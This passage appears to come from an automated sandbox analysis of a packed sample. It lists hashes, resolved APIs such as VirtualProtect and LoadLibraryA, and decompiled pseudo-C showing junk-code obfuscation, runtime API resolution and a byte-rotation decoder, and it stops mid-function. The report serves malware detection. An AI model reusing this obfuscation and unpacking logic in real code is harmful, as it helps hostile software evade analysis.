0x01058733
0x0105873c
0x0105873c
0x01058745
0x01058745
0x0105874b
0x0105874e
0x01058758
0x0105875a
0x01058760
0x01058767
0x0105876a
0x01058778
0x01058778
0x0105877e
0x0105878b
0x0105878d
0x01058793
0x01058793
0x00000000
0x0105878b

APIs

VirtualProtect.KERNELBASE(00000000,00000000), ref: 0105877E

Strings

@, xrefs: 0105863C

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: ac4456ae91e3668e6bab5ec8c00953cbdf546229bb63e9af8e697e76fdf3d0ef
Instruction ID: c28581c9285289ad12ad7269b619f5647c2a08f35e733f7657c14017e520d414
Opcode Fuzzy Hash: ac4456ae91e3668e6bab5ec8c00953cbdf546229bb63e9af8e697e76fdf3d0ef
Instruction Fuzzy Hash: D912F2B1804708DFEB509F64C4C976DBBF1FF44326F0985A9DC899A24AD77811A4CF2A

Uniqueness

Uniqueness Score: -1.00%

Function 0105538D, Relevance: 2.1, APIs: 1, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2f1255394b85d7b0370bd81bfc3678e3af94fbf691729cb5bfd2053fc445de
Instruction ID: d7aa6eebfd5722247df11597cd9273efda7a6ede13f33801c3646acc0b79e5be
Opcode Fuzzy Hash: ec2f1255394b85d7b0370bd81bfc3678e3af94fbf691729cb5bfd2053fc445de
Instruction Fuzzy Hash: 0A52E171804709DFEB519F64C8C876ABBF4FF08316F0945A9DC899A24BD37454A0CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 010555AE, Relevance: 1.9, APIs: 1, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e83369ed16da17d592c4202c20efecf363eee715f6a9f6b8740f54d96b3a7708
Instruction ID: 50fe17e94495a1248c0cf38a3c002a85798272dd223bf356b729b947f87297dc
Opcode Fuzzy Hash: e83369ed16da17d592c4202c20efecf363eee715f6a9f6b8740f54d96b3a7708
Instruction Fuzzy Hash: D0220271804609DFEB559F64C8C876ABBF4FF08316F0944A9EC899E24BD37454A0CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0105565A, Relevance: 1.9, APIs: 1, Instructions: 401libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000000,00000000,?,00000000,?), ref: 01055851

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 16d052a219b198bc49a96e0fd3a034b5c55be3061736e92e2a544e4043043cce
Instruction ID: dae6d19eae7981d17128f70c4dd63ce15c2632157f58faaf0ef9943d3c955141
Opcode Fuzzy Hash: 16d052a219b198bc49a96e0fd3a034b5c55be3061736e92e2a544e4043043cce
Instruction Fuzzy Hash: 6A120271804609DFEB559FA4C8C876ABBF4FF08316F0944A9EC899E24BD37454A0CF69

Uniqueness

Uniqueness Score: -1.00%

Function 010587CD, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca54cc38d02fc46d634d83d28bb14d3ae5add62a85f0d26ca50731c8d6d064d7
Instruction ID: 808b53863d551fb7860bf49db376538d2c0c31b27c321d59bcd2312136ec442b
Opcode Fuzzy Hash: ca54cc38d02fc46d634d83d28bb14d3ae5add62a85f0d26ca50731c8d6d064d7
Instruction Fuzzy Hash: C7B10171804704DFEB549F64C4C9769BBF0FF04326F0984AADC899A24BD77815A4CF6A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01056743, Relevance: 1.4, Strings: 1, Instructions: 105
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E01056743(signed int __eax, void* __ebx, signed int _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t66;
				void* _t76;
				void* _t82;
				void* _t83;
				signed int _t87;
				void* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				void* _t109;

				_t82 = __ebx;
				_t62 = __eax;
				if(__eax > 0x1eaf) {
					 *((intOrPtr*)(__ebx + 0x45cce0)) =  *((intOrPtr*)(__ebx + 0x45cce0)) + __eax;
					_a4 = _a4 & 0x00000000;
				} else {
					_t83 = _t83 - 1;
					_a4 = 0x2c;
				}
				_t92 = _t91 + 1;
				_t102 = _t101 & 0xffffffff;
				_v8 = _v8 - 1;
				if(_t62 < 0xe7e3) {
					_v8 = _v8 | _t92;
					_t63 = _t62 ^ 0xffffffff;
				} else {
					_t102 = 0;
					_t63 = _t62 + 1 - 0x28;
					 *(_t82 + 0x45d1e8) = 0xffffffff;
				}
				_v12 = _t102;
				_t93 = _t92 + _v8;
				_t65 = _t63 + 0xfffffffffffff83c;
				if(_t109 >=  *((intOrPtr*)(_t82 + 0x45d200))) {
					 *(_t82 + 0x45d1e8) = 1;
					_t87 = _t87 - 1;
					_t66 = _t65 & 0x00000001;
				} else {
					_a8 = _a8 - _t65;
					_t83 = _t83 - 1;
					_a4 = _a4 + 0x5ae;
					_t93 = _t93 - 0xfffffb9e;
					_t66 = _t65 ^ 0x00000000;
				}
				_a12 = _a12 ^ _t66;
				_a4 = _a4 - _t93;
				_v8 = _v8 ^ _t93;
				_v8 = 0xffffffff;
				_v12 = (_t87 | 0xffffffff) + 1 - 0xffffffff;
				_a8 = _a8 - 1;
				 *(_t82 + 0x45d1e8) =  *(_t82 + 0x45d1e8) - 1;
				 *(_t82 + 0x45cce0) = 0xffffffff;
				_t76 = E01059CFF(0, _t82,  *((intOrPtr*)(_t82 + 0x45c308)), 0);
				 *(_t82 + 0x45cce0) =  *(_t82 + 0x45cce0) + _t83;
				_a12 = _a12 + 1;
				 *(_t82 + 0x45d1e8) =  *(_t82 + 0x45d1e8) | 0x00000585;
				 *((intOrPtr*)(_t82 + 0x45d200)) =  *((intOrPtr*)(_t82 + 0x45d200)) - 1;
				_v12 = _v12 + 1;
				_a12 = _a12 ^ 0x00000000;
				return (_t76 + 0xffffffff ^ 0xffffffffffffffff) - 0xffffffff;
			}

0x01056743
0x01056743
0x01056753
0x01056761
0x01056767
0x01056755
0x01056755
0x01056758
0x01056758
0x0105676b
0x0105676c
0x0105676f
0x01056778
0x0105679f
0x010567a2
0x0105677a
0x01056789
0x0105678e
0x01056793
0x01056793
0x010567ac
0x010567b0
0x010567b3
0x010567be
0x010567d8
0x010567e2
0x010567e3
0x010567c0
0x010567c0
0x010567c3
0x010567c4
0x010567cb
0x010567d1
0x010567d1
0x010567e8
0x010567ee
0x010567f1
0x0105680b
0x01056826
0x01056848
0x01056854
0x0105685a
0x0105686d
0x0105687d
0x0105688b
0x01056897
0x010568b3
0x010568c1
0x010568ca
0x010568d4

Strings

,, xrefs: 01056758

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 732e157b878cade1655ce16596fb901788fe45d62f20795460620c4adc7731f0
Instruction ID: b122095a5e5e6390a66a5d62f24fe44d781de20d498a3bcecf36a4f67faa99d9
Opcode Fuzzy Hash: 732e157b878cade1655ce16596fb901788fe45d62f20795460620c4adc7731f0
Instruction Fuzzy Hash: 8141B573C10A089BFB548F38CD4938E3AA0FF41335F288369EC759A1D5D77986919B94

Uniqueness

Uniqueness Score: -1.00%

Function 01059571, Relevance: 1.4, Strings: 1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E01059571(signed int __eax, void* __ebx, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t85;
				signed int _t86;
				void* _t102;
				signed int _t103;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				signed int _t115;
				signed int _t122;

				_t102 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x45cd44)) != 0xc55) {
					_t109 = _t109 ^ _t103;
					_v8 = _v8 - 1;
					 *(__ebx + 0x45d264) =  *(__ebx + 0x45d264) & _t122;
					_t85 = E01056326(__eax ^ 0xfffffe8e, __ebx, 0,  *((intOrPtr*)(__ebx + 0x45cef8))) - 1;
					__eflags = _t85;
				} else {
					 *((intOrPtr*)(__ebx + 0x45cd44)) =  *((intOrPtr*)(__ebx + 0x45cd44)) + 1;
					_a4 = _a4 ^ 0xfffff82c;
					_t85 = __eax ^ 0x00000000;
					 *(__ebx + 0x45d264) =  *(__ebx + 0x45d264) + 1;
				}
				_t110 = _t109 + 1;
				 *(_t102 + 0x45cd44) =  *(_t102 + 0x45cd44) + 0xffffffff;
				if( *(_t102 + 0x45cd44) < 0xe92f) {
					_t86 = _t85 & 0x00000000;
					__eflags = _t86;
				} else {
					_t86 = _t85 | _v8;
					_a12 = _a12 + 1;
					_t114 = _t114 | _t122;
				}
				_t115 = _t114 - 0xffffffff;
				_a4 = 0xfffffcd0;
				_v8 = _v8 | _t110;
				if(_v8 != 0xbb5b) {
					_t86 = E01057BD6((_t86 & 0x00000001) + 1, _t102, __eflags,  *((intOrPtr*)(_t102 + 0x45d178))) ^ 0x00000000;
					__eflags = _t115 ^ _a8;
				} else {
					 *(_t102 + 0x45cd44) =  *(_t102 + 0x45cd44) + 0xffffffff;
					_v8 = _v8 - 1;
				}
				 *(_t102 + 0x45cd44) =  *(_t102 + 0x45cd44) ^ 0xffffffff;
				_t111 = _t110 | _t86;
				 *(_t102 + 0x45d264) =  *(_t102 + 0x45d264) - 0xfffffc31;
				 *(_t102 + 0x45d264) =  *(_t102 + 0x45d264) - 1;
				_v8 = _v8 - 1;
				 *(_t102 + 0x45d264) =  *(_t102 + 0x45d264) | 0xfffffef8;
				 *(_t102 + 0x45d264) =  *(_t102 + 0x45d264) + 1;
				_v8 = _v8 - _t111;
				_a4 = _a4 - 1;
				 *(_t102 + 0x45d264) =  *(_t102 + 0x45d264) ^ 0x00000000;
				_a8 = 0xfffff83a;
				_v8 = _v8 & _t111 + 0x00000001;
				 *(_t102 + 0x45cd44) =  *(_t102 + 0x45cd44) ^ 0x00000000;
				 *(_t102 + 0x45d264) =  *(_t102 + 0x45d264) & (_t111 & 0x00000000) + 0x00000001;
				_v8 = _v8 - 1;
				return 0xfffffffffffffb5c;
			}

0x01059571
0x01059586
0x010595a5
0x010595a7
0x010595ab
0x010595be
0x010595be
0x01059588
0x01059588
0x0105958e
0x01059595
0x01059598
0x01059598
0x010595bf
0x010595c0
0x010595d1
0x010595e7
0x010595e7
0x010595d3
0x010595d3
0x010595d6
0x010595e1
0x010595e3
0x010595ed
0x010595f0
0x01059604
0x0105960e
0x01059634
0x01059639
0x01059610
0x01059610
0x01059617
0x0105961a
0x01059644
0x0105964b
0x0105964d
0x01059657
0x01059672
0x0105967d
0x01059687
0x0105968d
0x01059698
0x010596b8
0x010596bf
0x010596c6
0x010596d7
0x010596ed
0x010596fa
0x0105971c

Strings

/, xrefs: 010595C7

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID: /
API String ID: 0-2904984239
Opcode ID: a593bbc640b3599c2f619a790145e9a2a9081c82f6d1033546906a5c1751be3f
Instruction ID: 877411cfe794f4f62a2f5d77f19e0b6da6b074a3963fae0d9646e56ad7515b87
Opcode Fuzzy Hash: a593bbc640b3599c2f619a790145e9a2a9081c82f6d1033546906a5c1751be3f
Instruction Fuzzy Hash: E6417132815705DFEB248F38CE8539A3B30EF40336F2883A5AD699E0D7D7748666DA54

Uniqueness

Uniqueness Score: -1.00%

Function 01053943, Relevance: .8, Instructions: 763
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E01053943(signed int __eax, void* __ebx, signed int __ecx, void* __edx, signed int __edi, signed int __esi, signed int _a4, void* _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				intOrPtr* _t394;
				signed int _t396;
				signed int _t404;
				signed int _t408;
				intOrPtr* _t410;
				signed int _t422;
				signed int _t425;
				signed int _t426;
				intOrPtr* _t429;
				intOrPtr* _t432;
				signed int _t442;
				signed int _t448;
				signed int _t454;
				intOrPtr* _t455;
				signed int _t456;
				signed int _t461;
				void* _t465;
				void* _t468;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t480;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				int _t487;
				int _t491;
				int _t494;
				void* _t511;
				signed int _t513;
				signed int _t514;
				void* _t523;
				signed int _t525;
				void* _t526;
				signed int _t528;
				void* _t530;
				void* _t533;
				signed int _t544;
				signed int _t545;
				void* _t547;
				void* _t550;
				void* _t551;
				void* _t552;
				signed int _t559;
				signed int* _t560;
				signed int* _t565;
				signed int* _t566;
				signed int* _t567;
				signed int* _t568;

				_t544 = __esi;
				_t525 = __edi;
				_t511 = __edx;
				_t475 = __ecx;
				_t465 = __ebx;
				_t383 = __eax;
				_push(__eax);
				 *_t565 =  *_t565 - __eax;
				 *_t565 =  *_t565 | _t559;
				_t560 = _t565;
				_t566 =  &(_t565[0xfffffffffffffffd]);
				if( *((intOrPtr*)(__ebx + 0x45c06c)) == 0) {
					_t383 =  *((intOrPtr*)(__ebx + 0x45d64c))();
					 *((intOrPtr*)(__ebx + 0x45c06c)) = __eax;
				}
				if( *(_t465 + 0x45c5a0) != 0) {
					L13:
					_v16 = 0;
					_push(_v16);
					 *_t566 =  *_t566 | _t544;
					if( *(_t465 + 0x45cc00) == 0) {
						_t383 =  *((intOrPtr*)(_t465 + 0x45d648))();
						 *(_t465 + 0x45cc00) = _t383;
					}
					if( *(_t465 + 0x45cfb4) == 0) {
						if( *((intOrPtr*)(_t465 + 0x45c540)) == 0) {
							 *((intOrPtr*)(_t465 + 0x45c540)) =  *((intOrPtr*)(_t465 + 0x45d64c))();
						}
						_t442 = _t465 + 0x45c758;
						if( *((intOrPtr*)(_t465 + 0x45c98c)) == 0) {
							 *_t566 =  *_t566 & 0x00000000;
							 *_t566 =  *_t566 | _t442;
							_v16 = 0;
							_v28 = _v28 | _t465 + 0x0045d158;
							 *((intOrPtr*)(_t465 + 0x45c98c)) =  *((intOrPtr*)(_t465 + 0x45d674))(_v16, _t465);
							_t442 = _v28;
							_t566 =  &(_t566[1]);
						}
						_v12 = 0;
						_push(_v12);
						 *_t566 =  *_t566 ^ _t442;
						if( *(_t465 + 0x45c6d8) == 0) {
							_v28 = _v28 & 0x00000000;
							_v28 = _v28 + _t442;
							_t560 = _v32;
							_v32 =  *((intOrPtr*)(_t465 + 0x45cd04));
							_t448 =  *((intOrPtr*)(_t465 + 0x45d6f0))(_t560, _t560);
							 *(_t465 + 0x45c6d8) = _t448;
							_t442 = _t448 & 0x00000000 | _v32;
							_t566 =  &(_t566[1]);
						}
						 *_t442 = 0x30;
						if( *((intOrPtr*)(_t465 + 0x45c90c)) == 0) {
							 *((intOrPtr*)(_t465 + 0x45c90c)) =  *((intOrPtr*)(_t465 + 0x45d670))();
						}
						_push(_t525);
						_v28 =  *((intOrPtr*)(_t465 + 0x45c848));
						_t475 = _t475;
						if( *((intOrPtr*)(_t465 + 0x45c99c)) == 0) {
							_v32 = _v32 & 0x00000000;
							_v32 = _v32 ^ _t465 + 0x0045c208;
							 *((intOrPtr*)(_t465 + 0x45c99c)) =  *((intOrPtr*)(_t465 + 0x45d674))(_t560);
						}
						_t383 =  *((intOrPtr*)(_t465 + 0x45d6f4))();
						if( *((intOrPtr*)(_t465 + 0x45c4c4)) == 0) {
							_v32 = _v32 - _t475;
							_v32 = _t383;
							_v36 =  *((intOrPtr*)(_t465 + 0x45d390));
							_t525 = _t525;
							 *((intOrPtr*)(_t465 + 0x45c4c4)) =  *((intOrPtr*)(_t465 + 0x45d6f0))(_t475);
							 *_t71 = _t560;
							_t383 = 0 + _v12;
						}
						 *(_t465 + 0x45cfb4) = _t383;
						if( *(_t465 + 0x45c6c4) == 0) {
							_t383 =  *((intOrPtr*)(_t465 + 0x45d64c))();
							 *(_t465 + 0x45c6c4) = _t383;
						}
					}
					_v12 = 0;
					_push(_v12);
					 *_t566 =  *_t566 | _t525;
					if( *(_t465 + 0x45caa4) == 0) {
						_v28 = _t465 + 0x45c7f4;
						_t383 =  *((intOrPtr*)(_t465 + 0x45d678))(_v16);
						 *(_t465 + 0x45caa4) = _t383;
					}
					if( *(_t465 + 0x45cf7c) == 0) {
						if( *((intOrPtr*)(_t465 + 0x45ceb4)) == 0) {
							_v28 =  *((intOrPtr*)(_t465 + 0x45d0d8));
							 *((intOrPtr*)(_t465 + 0x45ceb4)) =  *((intOrPtr*)(_t465 + 0x45d6f0))(_t383, _t525);
						}
						_t383 =  *((intOrPtr*)(_t465 + 0x45d64c))();
						if( *((intOrPtr*)(_t465 + 0x45c9dc)) == 0) {
							_v12 = 0;
							_v28 = _v28 + _t383;
							_v32 =  *((intOrPtr*)(_t465 + 0x45c640));
							 *((intOrPtr*)(_t465 + 0x45c9dc)) =  *((intOrPtr*)(_t465 + 0x45d6f0))(_t525, _v12);
							 *_t98 = _t544;
							_t383 = _v16;
						}
						 *(_t465 + 0x45cf7c) = _t383;
						if( *(_t465 + 0x45c4bc) == 0) {
							_v28 =  *((intOrPtr*)(_t465 + 0x45c398));
							_t383 =  *((intOrPtr*)(_t465 + 0x45d6f0))(_t383);
							 *(_t465 + 0x45c4bc) = _t383;
						}
					}
					_t545 = _a4;
					if( *(_t465 + 0x45d284) == 0) {
						_t383 =  *((intOrPtr*)(_t465 + 0x45d670))();
						 *(_t465 + 0x45d284) = _t383;
					}
					if( *(_t465 + 0x45c604) == 0) {
						if( *((intOrPtr*)(_t465 + 0x45ca70)) == 0) {
							_t432 = _t465 + 0x45c180;
							_v28 = _t432;
							 *_t432 = 0x30;
							_t475 = _v32;
							_v32 =  *((intOrPtr*)(_t465 + 0x45cf14));
							 *((intOrPtr*)(_t465 + 0x45ca70)) =  *((intOrPtr*)(_t465 + 0x45d6f4))(_t475, _v16);
						}
						_t425 = _t465 + 0x45c7d8;
						if( *((intOrPtr*)(_t465 + 0x45c54c)) == 0) {
							_v28 = _v28 & 0x00000000;
							_v28 = _v28 | _t425;
							_t429 = _t465 + 0x45cf80;
							_v32 = _v32 ^ _t475;
							_v32 = _v32 + _t429;
							 *_t429 = 0x30;
							 *((intOrPtr*)(_t465 + 0x45c54c)) =  *((intOrPtr*)(_t465 + 0x45d6f4))(0, _t475, _t465);
							_t425 = _v36;
							_t566 = _t566 - 0xfffffffc;
						}
						_push(_v16);
						_v28 = _t425;
						if( *((intOrPtr*)(_t465 + 0x45c4b4)) == 0) {
							_t511 = _v32;
							_v32 =  *((intOrPtr*)(_t465 + 0x45cefc));
							 *((intOrPtr*)(_t465 + 0x45c4b4)) =  *((intOrPtr*)(_t465 + 0x45d6f0))(_t511);
						}
						_t383 =  *((intOrPtr*)(_t465 + 0x45d678))();
						if( *(_t465 + 0x45d1ac) == 0) {
							_v32 = _t383;
							_t426 =  *((intOrPtr*)(_t465 + 0x45d648))(_v16);
							 *(_t465 + 0x45d1ac) = _t426;
							_t383 = _t426 & 0x00000000 ^ _v32;
							_t566 =  &(_t566[1]);
						}
						 *(_t465 + 0x45c604) = _t383;
						if( *(_t465 + 0x45d2f0) == 0) {
							_t383 =  *((intOrPtr*)(_t465 + 0x45d670))();
							 *(_t465 + 0x45d2f0) = _t383;
						}
					}
					_t526 = _a8;
					if( *(_t465 + 0x45d2e8) == 0) {
						_v12 = 0;
						_v28 = _v28 | _t465 + 0x0045ca7c;
						_t383 =  *((intOrPtr*)(_t465 + 0x45d674))(_v12);
						 *(_t465 + 0x45d2e8) = _t383;
					}
					if( *(_t465 + 0x45cdd0) == 0) {
						if( *((intOrPtr*)(_t465 + 0x45cd60)) == 0) {
							_t422 = _t465 + 0x45c314;
							_v28 = _v28 & 0x00000000;
							_v28 = _v28 | _t422;
							 *_t422 = 0x30;
							_v32 =  *((intOrPtr*)(_t465 + 0x45ce20));
							_t560 = _t560;
							 *((intOrPtr*)(_t465 + 0x45cd60)) =  *((intOrPtr*)(_t465 + 0x45d6f4))(_t526, _t511);
						}
						_v16 = _v16 & 0x00000000;
						_v28 = _v28 | _t465 + 0x0045ce0c;
						_t383 =  *((intOrPtr*)(_t465 + 0x45d678))(_v16);
						 *(_t465 + 0x45cdd0) = _t383;
					}
					_push(_t465);
					_v28 =  *((intOrPtr*)(_t545 + 8));
					_t528 = _t526;
					if( *(_t465 + 0x45ca24) == 0) {
						_t383 =  *((intOrPtr*)(_t465 + 0x45d648))();
						 *(_t465 + 0x45ca24) = _t383;
					}
					_push(_t383);
					_v32 = _v32 - _t383;
					_v32 = _v32 | _t528;
					if( *(_t465 + 0x45d228) == 0) {
						_v12 = 0;
						_v36 = _v36 + _t465 + 0x45ca8c;
						_t383 =  *((intOrPtr*)(_t465 + 0x45d674))(_v12);
						 *(_t465 + 0x45d228) = _t383;
					}
					_t476 =  *(_t465 + 0x45caa8);
					if( *(_t465 + 0x45d0f0) == 0) {
						_v36 = _v36 & 0x00000000;
						_v36 = _v36 | _t476;
						 *_t566 =  *(_t465 + 0x45cfdc);
						_t383 =  *((intOrPtr*)(_t465 + 0x45d6f0))(_t528);
						 *(_t465 + 0x45d0f0) = _t383;
						 *_t175 = _t383;
						_t476 = 0 ^ _v16;
					}
					_t477 = _t476 + 0xfffffff0;
					_t468 = _t465;
					if( *(_t468 + 0x45c798) == 0) {
						_v36 = _t477;
						 *_t566 =  *_t566 ^ _t477;
						 *_t566 =  *_t566 ^ _t468 + 0x0045c38c;
						_t383 =  *((intOrPtr*)(_t468 + 0x45d674))(_t477, _v16);
						 *(_t468 + 0x45c798) = _t383;
						_t477 = (_t477 & 0x00000000) +  *_t566;
						_t566 =  &(_t566[1]);
					}
					_push(_t383);
					_v36 = _v36 - _t383;
					_v36 = _v36 | _t477;
					if( *((intOrPtr*)(_t468 + 0x45cddc)) == 0) {
						 *_t566 = _t477;
						_v12 = 0;
						_v44 = _v44 | _t468 + 0x0045ccd4;
						 *((intOrPtr*)(_t468 + 0x45cddc)) =  *((intOrPtr*)(_t468 + 0x45d674))(_v12, _v16);
						_t477 = _v44;
						_t566 = _t566 - 0xfffffffc;
					}
					_push(0);
					 *_t566 =  *_t566 + _t477;
					_t480 = _t545;
					if( *((intOrPtr*)(_t468 + 0x45cd4c)) == 0) {
						_v12 = _v12 & 0x00000000;
						 *_t566 =  *_t566 + _t480;
						_v44 = 1;
						 *((intOrPtr*)(_t468 + 0x45cd4c)) =  *((intOrPtr*)(_t468 + 0x45d6f0))(_t511, _v12);
						_t480 = 0 ^ _v44;
						_t566 = _t566 - 0xfffffffc;
					}
					do {
						asm("movsb");
						if( *((intOrPtr*)(_t468 + 0x45d0dc)) == 0) {
							_v16 = 0;
							 *_t566 =  *_t566 | _t480;
							 *((intOrPtr*)(_t468 + 0x45d0dc)) =  *((intOrPtr*)(_t468 + 0x45d670))(_v16);
							_t480 =  *_t566;
							_t566 =  &(_t566[1]);
						}
						_t480 = _t480 - 1;
					} while (_t480 != 0);
					if( *((intOrPtr*)(_t468 + 0x45c8c8)) == 0) {
						 *_t566 =  *_t566 - _t560;
						 *_t566 =  *_t566 | _t468 + 0x0045ca30;
						 *((intOrPtr*)(_t468 + 0x45c8c8)) =  *((intOrPtr*)(_t468 + 0x45d674))(_t560);
					}
					_t483 = 0 ^ _v36;
					_t567 =  &(_t566[1]);
					if( *((intOrPtr*)(_t468 + 0x45c8a4)) == 0) {
						_v36 = _t483;
						_t410 = _t468 + 0x45c5a4;
						_v12 = 0;
						 *_t567 =  *_t567 + _t410;
						 *_t410 = 0x30;
						_v44 =  *((intOrPtr*)(_t468 + 0x45d2ac));
						_t528 = _t528;
						 *((intOrPtr*)(_t468 + 0x45c8a4)) =  *((intOrPtr*)(_t468 + 0x45d6f4))(_v12, _v12);
						 *_t213 = _t483;
						_t483 = _v16;
					}
					_pop( *_t215);
					_t530 = (_t528 & 0x00000000) + _v12;
					if( *((intOrPtr*)(_t468 + 0x45c060)) == 0) {
						_v32 = _v32 ^ _t511;
						_v32 = _t483;
						 *((intOrPtr*)(_t468 + 0x45c060)) =  *((intOrPtr*)(_t468 + 0x45d64c))(_t511);
						_t483 = _t483 & 0x00000000 | _v32;
						_t567 = _t567 - 0xfffffffc;
					}
					_t547 = _t530;
					_push(_t511);
					_v32 = _v32 & 0x00000000;
					_v32 = _v32 | _t468;
					do {
						_t385 =  *_t547 & 0x000000ff;
						_t547 = _t547 + 1;
						if(_t385 == 0) {
							goto L84;
						}
						_t511 = _t547;
						_v8 = 8;
						do {
							asm("rol eax, 1");
							_t468 = _t385;
							_t385 = _t511;
							asm("ror ebx, 1");
							_t221 =  &_v8;
							 *_t221 = _v8 - 1;
						} while ( *_t221 != 0);
						_t385 = 0;
						L84:
						asm("stosb");
						_t483 = _t483 - 1;
					} while (_t483 != 0);
					_t471 = _v32;
					_t568 =  &(_t567[1]);
					if( *(_t471 + 0x45c428) == 0) {
						_t408 = _t471 + 0x45cd64;
						_v16 = _v16 & 0x00000000;
						_v32 = _v32 | _t408;
						 *_t408 = 0x30;
						_v36 =  *((intOrPtr*)(_t471 + 0x45cbd8));
						_t547 = _t547;
						_t385 =  *((intOrPtr*)(_t471 + 0x45d6f4))(_t530, _v16);
						 *(_t471 + 0x45c428) = _t385;
					}
					if(_a4 != 0) {
						if( *(_t471 + 0x45c1bc) == 0) {
							_t385 =  *((intOrPtr*)(_t471 + 0x45d670))();
							 *(_t471 + 0x45c1bc) = _t385;
						}
						if(_a8 != 0) {
							if( *((intOrPtr*)(_t471 + 0x45cd00)) == 0) {
								_v12 = 0;
								_v32 = _v32 | _t471 + 0x0045d248;
								 *((intOrPtr*)(_t471 + 0x45cd00)) =  *((intOrPtr*)(_t471 + 0x45d678))(_v12);
							}
							_push(_t547);
							_v32 = _a4;
							_t523 = _t511;
							if( *((intOrPtr*)(_t471 + 0x45d0ec)) == 0) {
								_v16 = _v16 & 0x00000000;
								_v36 = _v36 + _t471 + 0x45c8e4;
								 *((intOrPtr*)(_t471 + 0x45d0ec)) =  *((intOrPtr*)(_t471 + 0x45d674))(_v16);
							}
							_push(_t530);
							_t530 = _v36;
							_v36 = _a8;
							if( *((intOrPtr*)(_t471 + 0x45cfd8)) == 0) {
								 *_t568 = _t471 + 0x45d2f4;
								 *((intOrPtr*)(_t471 + 0x45cfd8)) =  *((intOrPtr*)(_t471 + 0x45d678))(_v16);
							}
							_t385 = E01053000(_t385, _t471, _t483, _t523, _t547);
							if( *(_t471 + 0x45d180) == 0) {
								_t404 = _t471 + 0x45c6dc;
								_v16 = 0;
								_v32 = _v32 | _t404;
								 *_t404 = 0x30;
								_t385 =  *((intOrPtr*)(_t471 + 0x45d6f4))(0, _v16);
								 *(_t471 + 0x45d180) = _t385;
							}
						}
					}
					_pop( *_t265);
					_t513 = 0 + _v16;
					if( *(_t471 + 0x45ccfc) == 0) {
						_v28 = _v28 - _t560;
						_v28 = _v28 | _t513;
						_v32 = _v32 + 1;
						_v32 = _v32 - _t530;
						_t385 =  *((intOrPtr*)(_t471 + 0x45d6f0))(_t530, _t560);
						 *(_t471 + 0x45ccfc) = _t385;
						_t513 = 0 ^ _v32;
						_t568 = _t568 - 0xfffffffc;
					}
					if(_t513 > 0) {
						if( *((intOrPtr*)(_t471 + 0x45ccc0)) == 0) {
							_v28 = _v28 & 0x00000000;
							_v28 = _v28 | _t471 + 0x0045cd34;
							 *((intOrPtr*)(_t471 + 0x45ccc0)) =  *((intOrPtr*)(_t471 + 0x45d674))(_t560);
						}
						_t533 = _a4;
						if( *((intOrPtr*)(_t471 + 0x45ce08)) == 0) {
							 *((intOrPtr*)(_t471 + 0x45ce08)) =  *((intOrPtr*)(_t471 + 0x45d648))();
						}
						_push(_t483);
						_v28 = _v28 & 0x00000000;
						_v28 = _v28 | _t533;
						if( *((intOrPtr*)(_t471 + 0x45cf0c)) == 0) {
							 *((intOrPtr*)(_t471 + 0x45cf0c)) =  *((intOrPtr*)(_t471 + 0x45d648))();
						}
						_t484 =  *(_t533 + 4);
						if( *((intOrPtr*)(_t471 + 0x45c970)) == 0) {
							_v16 = _v16 & 0x00000000;
							_v32 = _v32 ^ _t484;
							_v36 =  *((intOrPtr*)(_t471 + 0x45d2a0));
							_t533 = _t533;
							 *((intOrPtr*)(_t471 + 0x45c970)) =  *((intOrPtr*)(_t471 + 0x45d6f0))(_v16);
							 *_t290 = _t560;
							_t484 = _t484 & 0x00000000 ^ _v12;
						}
						_t386 =  *(_t533 + 8);
						if( *((intOrPtr*)(_t471 + 0x45c0ac)) == 0) {
							_v32 = _v32 & 0x00000000;
							_v32 = _v32 | _t386;
							_v36 = _t484;
							 *((intOrPtr*)(_t471 + 0x45c0ac)) =  *((intOrPtr*)(_t471 + 0x45d648))(_v16, _t513);
							_t484 = _t484 & 0x00000000 | _v36;
							_t568 =  &(_t568[1]);
							_pop( *_t297);
							_t386 = _v16;
						}
